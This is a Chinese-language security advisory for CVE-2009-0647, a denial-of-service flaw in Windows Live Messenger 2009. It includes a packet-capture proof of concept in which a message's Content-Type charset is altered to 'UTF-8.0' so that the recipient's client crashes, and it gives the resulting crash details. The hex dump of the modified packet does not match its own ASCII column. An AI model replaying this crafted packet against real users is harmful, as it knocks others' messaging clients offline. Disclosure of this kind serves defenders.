BUGTRAQ ID: 33825
CVE(CAN) ID: CVE-2009-0647
Windows Live Messenger是非常流行的即时通讯聊天工具。
Windows Live Messenger处理消息时存在拒绝服务漏洞,如果远程攻击者在向MSN联系人发送消息的Content-Type头中修改了字符集字段的UTF-8.0值的话,就会导致对方的MSN崩溃。
Microsoft Windows Live Messenger 2009
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
<a href=“http://www.microsoft.com/technet/security/” target=“_blank”>http://www.microsoft.com/technet/security/</a>
1 192.168.1.100:2038 64.4.34.31:1863 11 Send
0000 58 46 52 20 32 32 20 53 42 0D 0A XFR 22 SB..
2 192.168.1.100:2229 64.4.37.43:1863 104 Send
0000 55 53 52 20 37 39 20 77 65 62 6D 61 73 74 65 72 USR 79 webmaster
0010 40 61 72 61 62 69 63 73 65 63 75 72 69 74 79 2E @arabicsecurity.
0020 63 6F 6D 3B 7B 32 35 32 42 46 30 36 38 2D 38 45 com;{252BF068-8E
0030 46 35 2D 34 30 33 31 2D 38 36 35 42 2D 36 45 34 F5-4031-865B-6E4
0040 44 31 42 35 37 38 43 39 41 7D 20 34 36 32 33 33 D1B578C9A} 46233
0050 39 35 33 38 2E 32 31 30 32 31 35 33 39 2E 32 34 9538.21021539.24
0060 32 31 38 33 36 37 0D 0A 218367..
3 192.168.1.100:2229 64.4.37.43:1863 37 Send
0000 43 41 4C 20 37 36 20 77 65 62 6D 61 73 74 65 72 CAL 76 webmaster
0010 40 61 72 61 62 69 63 73 65 63 75 72 69 74 79 2E @arabicsecurity.
0020 63 6F 6D 0D 0A com..
4 192.168.1.100:2229 64.4.37.43:1863 33 Send
0000 43 41 4C 20 37 37 20 68 61 63 6B 5F 61 6E 79 5F CAL 77 hack_any_
0010 6F 6E 65 40 68 6F 74 6D 61 69 6C 2E 63 6F 6D 0D [email protected].
0020 0A .
5 192.168.1.100:2229 64.4.37.43:1863 146 Send
0000 4D 53 47 20 37 38 20 4E 20 31 33 32 0D 0A 4D 49 MSG 78 N 132..MI
0010 4D 45 2D 56 65 72 73 69 6F 6E 3A 20 31 2E 30 0D ME-Version: 1.0.
0020 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t
0030 65 78 74 2F 70 6C 61 69 6E 3B 20 63 68 61 72 73 ext/plain; chars
0040 65 74 3D 55 54 46 2D 38 0D 0A 58 2D 4D 4D 53 2D et=UTF-8..X-MMS-
0050 49 4D 2D 46 6F 72 6D 61 74 3A 20 46 4E 3D 41 72 IM-Format: FN=Ar
0060 61 62 69 63 25 32 30 54 72 61 6E 73 70 61 72 65 abic%20Transpare
0070 6E 74 3B 20 45 46 3D 42 3B 20 43 4F 3D 66 66 3B nt; EF=B; CO=ff;
0080 20 43 53 3D 62 32 3B 20 50 46 3D 32 0D 0A 0D 0A CS=b2; PF=2....
0090 68 69 hi
将最后的5号报文更改为:
5 192.168.1.100:2229 64.4.37.43:1863 146 Send
0000 4D 53 47 20 37 38 20 4E 20 31 33 32 0D 0A 4D 49 MSG 78 N 132..MI
0010 4D 45 2D 56 65 72 73 69 6F 6E 3A 20 31 2E 30 0D ME-Version: 1.0.
0020 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t
0030 65 78 74 2F 70 6C 61 69 6E 3B 20 63 68 61 72 73 ext/plain; chars
0040 65 74 3D 55 54 46 2D 38 0D 0A 58 2D 4D 4D 53 2D et=UTF-8.0.X-MMS-
0050 49 4D 2D 46 6F 72 6D 61 74 3A 20 46 4E 3D 41 72 IM-Format: FN=Ar
0060 61 62 69 63 25 32 30 54 72 61 6E 73 70 61 72 65 abic%20Transpare
0070 6E 74 3B 20 45 46 3D 42 3B 20 43 4F 3D 66 66 3B nt; EF=B; CO=ff;
0080 20 43 53 3D 62 32 3B 20 50 46 3D 32 0D 0A 0D 0A CS=b2; PF=2....
0090 68 69 hi
重新发送就会导致目标MSN出现以下错误崩溃:
AppName: msnmsgr.exe AppVer: 14.0.8064.206 ModName: msvcr80.dll
ModVer: 8.0.50727.1433 Offset: 0000faa3